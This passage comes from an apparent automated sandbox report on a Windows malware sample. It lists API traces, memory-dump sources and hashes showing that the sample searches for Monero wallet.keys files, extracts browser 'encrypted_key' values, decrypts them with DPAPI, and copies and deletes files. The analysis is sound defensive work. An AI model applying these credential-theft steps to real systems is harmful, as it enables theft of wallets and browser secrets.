                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: cbac67d9aa852096d690b07c98b431859737ef6824197ef63f877059ea350d44
                        • Instruction ID: 308837b697d75733d72a52bd6e10f2321f1cc3cfca48216837931cfafbbbbfc2
                        • Opcode Fuzzy Hash: cbac67d9aa852096d690b07c98b431859737ef6824197ef63f877059ea350d44
                        • Instruction Fuzzy Hash: 660112B5A40208FFDB10DFD0DC49FAEB7B8EB48701F008155FA45A7284D675AA018B50
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 3c5e53f9110d9ce18d0c7c30f0bfa7466ccc4acabb91c46ac54e95d7abfae5cc
                        • Instruction ID: e8a7733ba12377507f23872b1a670f86bea2e56bd54806389126b04c73c1eb70
                        • Opcode Fuzzy Hash: 3c5e53f9110d9ce18d0c7c30f0bfa7466ccc4acabb91c46ac54e95d7abfae5cc
                        • Instruction Fuzzy Hash: 1041F6B110079C5EDB258B24CC89FFBBFF89B45708F2454E8E98AB6182D271DA45DF60
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E36663
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E36726
                        • ExitProcess.KERNEL32 ref: 00E36755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 8f7847563549c4ae1f87cdcb0f88d51f660eb7c32c6da02b70d574590fcba5ae
                        • Instruction ID: c9c10aae6714fc6eee5e9126d3a0075004d8d93133d3f8ba875ad725025b0197
                        • Opcode Fuzzy Hash: 8f7847563549c4ae1f87cdcb0f88d51f660eb7c32c6da02b70d574590fcba5ae
                        • Instruction Fuzzy Hash: 28316DB1900208AADB14EB50DC89BDD7BB8AF48300F405198F24A77191DF746B88CF65
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E40E28,00000000,?), ref: 00E3882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38836
                        • wsprintfA.USER32 ref: 00E38850
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 37fd30d7a228d72e94b9eeab0b9142fe20224c8fa31df802c1d3c77c47c180ad
                        • Instruction ID: a9655841e62cddd57c4736b0afe5ecb8c3dc3d4272fcbbc13261b5d32cdd5cf1
                        • Opcode Fuzzy Hash: 37fd30d7a228d72e94b9eeab0b9142fe20224c8fa31df802c1d3c77c47c180ad
                        • Instruction Fuzzy Hash: 1421FEB1A44204EFDB14EF94DD49FAEBBB8FB48711F104119F645B7284C77AA901CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E3951E,00000000), ref: 00E38D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38D62
                        • wsprintfW.USER32 ref: 00E38D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 7aab9581dd6db5082971659e87fc337c33a0be63412c2e5087966b85f2a2514a
                        • Instruction ID: 22fc5ffa4fe2f1ee5a208006ec1c1c8f0c3ac39ce1cd37b7d5782e6c1b7078c7
                        • Opcode Fuzzy Hash: 7aab9581dd6db5082971659e87fc337c33a0be63412c2e5087966b85f2a2514a
                        • Instruction Fuzzy Hash: FEE08670B40208FFC710EB94DD09E5977B8EB44702F000054FD4AA7240D9766E008B51
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00E2A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00E2A6BC
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 6a5ba5e3ca57f58b2ea4c98e6007daedcfaa13a15b63b92147d2441c18114c83
                        • Instruction ID: 931cd8f62959df4fffb8ace2d6f5be63da8329ac6786a142890602584040da7f
                        • Opcode Fuzzy Hash: 6a5ba5e3ca57f58b2ea4c98e6007daedcfaa13a15b63b92147d2441c18114c83
                        • Instruction Fuzzy Hash: C3E12272810108ABCB18FBA4DC9AEEE777CAF54300F549179F55772091EF346A89CB62
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2D481
                        • lstrlen.KERNEL32(00000000), ref: 00E2D698
                        • lstrlen.KERNEL32(00000000), ref: 00E2D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 23ee6be945330f8d226be686e0308d25429ecdf7e7d8119ee8b462bc95e26c0c
                        • Instruction ID: 214b93f7f7d7477c056d4440bb7eac6160e68d88475699cf496451b1d9b2d5e1
                        • Opcode Fuzzy Hash: 23ee6be945330f8d226be686e0308d25429ecdf7e7d8119ee8b462bc95e26c0c
                        • Instruction Fuzzy Hash: 55913672910108ABCB18FBA0DC99EEE7778AF54300F545179F54773091EF346A89CB62
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2D801
                        • lstrlen.KERNEL32(00000000), ref: 00E2D99F
                        • lstrlen.KERNEL32(00000000), ref: 00E2D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: c0dd56067da76969de5ddc2f9aa12418a27521a67fdb1d9fd0d710f6abcdc138
                        • Instruction ID: 21b1cce191df8a828fae70a839e09decbc48d928134c10626b4f3c35ef9718da
                        • Opcode Fuzzy Hash: c0dd56067da76969de5ddc2f9aa12418a27521a67fdb1d9fd0d710f6abcdc138
                        • Instruction Fuzzy Hash: 048125729101189BCB08FBA4DC99EEE77B8AF54300F445179F587B7091EF346A49CB62
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E41580,00E40D92), ref: 00E2F54C
                        • lstrlen.KERNEL32(00000000), ref: 00E2F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 50e26f5d15dad949628429a368aeb7292e06addad750f276224556d8828091d3
                        • Instruction ID: 4405162b7223549f7c258de9f7e8a0754ec763db60d692ff66534b0239c14d6c
                        • Opcode Fuzzy Hash: 50e26f5d15dad949628429a368aeb7292e06addad750f276224556d8828091d3
                        • Instruction Fuzzy Hash: 7E514372D00108AADB08FFA0EC9ADED77B8AF54300F449578F44677191EE346A49CBA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-3520659465
                        • Opcode ID: d67639f81f5f0a0a7e199e95c6ec9426a45b545b743bc3920d6b2c09a776c976
                        • Instruction ID: 75f84b129f3e798de57c58e166e43b044eae85e1434bc03702e945912536f7f4
                        • Opcode Fuzzy Hash: d67639f81f5f0a0a7e199e95c6ec9426a45b545b743bc3920d6b2c09a776c976
                        • Instruction Fuzzy Hash: 665190F1D042189BDB24EBA0DC99FEEBBB4AF44304F1460A8E25577181EB746E88CF55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: c6e36111cfd96b0c745ce91832a807d8e468bde0d1b28df11659336c10f9a04b
                        • Instruction ID: 3d534878a0b7561c92ae346538a7b4e195cf25598e7aaa771dc22bd050e205d3
                        • Opcode Fuzzy Hash: c6e36111cfd96b0c745ce91832a807d8e468bde0d1b28df11659336c10f9a04b
                        • Instruction Fuzzy Hash: CB4121B1D10209AFCB04EFA4D84AEFEBBB4AB44304F049429F51577251DB756649CF91
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E29D39
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                          • Part of subcall function 00E29AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                          • Part of subcall function 00E29AC0: LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                          • Part of subcall function 00E29B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E29B84
                          • Part of subcall function 00E29B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E29BA3
                          • Part of subcall function 00E29B60: LocalFree.KERNEL32(?), ref: 00E29BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: cbe05b69ed2314909c31163efc05251246aa34588b507d488280c973a2036acd
                        • Instruction ID: c10ab4bc1a6b7f7fca9650ec73698fe57eea31e1063c90d13305337bb4ba4e41
                        • Opcode Fuzzy Hash: cbe05b69ed2314909c31163efc05251246aa34588b507d488280c973a2036acd
                        • Instruction Fuzzy Hash: 623150B6D10219ABCF04DBE4EC85BEEB7B8AF48304F146558E901B3242E7349A44CBA1
                        APIs
                        • __getptd.LIBCMT ref: 00E3C74E
                          • Part of subcall function 00E3BF9F: __amsg_exit.LIBCMT ref: 00E3BFAF
                        • __getptd.LIBCMT ref: 00E3C765
                        • __amsg_exit.LIBCMT ref: 00E3C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00E3C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: cb8d48947eb0d1396eee96dcb4bb2191569d44c20a3d826b3279ec21f2cf8d9f
                        • Instruction ID: eed98e1abddf9c717280960764885080a57142a4752e9f78e46e150754e854df
                        • Opcode Fuzzy Hash: cb8d48947eb0d1396eee96dcb4bb2191569d44c20a3d826b3279ec21f2cf8d9f
                        • Instruction Fuzzy Hash: 5FF09A32A043009BD721BBB89C0FB5A3FE06F00724F38714AFA55B62D2DB649981DF56
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34F7A
                        • lstrcat.KERNEL32(?,00E41070), ref: 00E34F97
                        • lstrcat.KERNEL32(?,01968B10), ref: 00E34FAB
                        • lstrcat.KERNEL32(?,00E41074), ref: 00E34FBD
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E3492C
                          • Part of subcall function 00E34910: FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                          • Part of subcall function 00E34910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                          • Part of subcall function 00E34910: FindClose.KERNEL32(000000FF), ref: 00E34B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 11772075343a27a19983d3ad857661b9942b3a0dfc96f5d933fc1ca526f87893
                        • Instruction ID: fc9ecaf4004b4fb909e2086a603320bec9efe3f97d53f5e557a7186c83cc701e
                        • Opcode Fuzzy Hash: 11772075343a27a19983d3ad857661b9942b3a0dfc96f5d933fc1ca526f87893
                        • Instruction Fuzzy Hash: 432177B6A00204ABC764F760EC4AEED377CAB94300F005594F699B3185EE7596C8CB91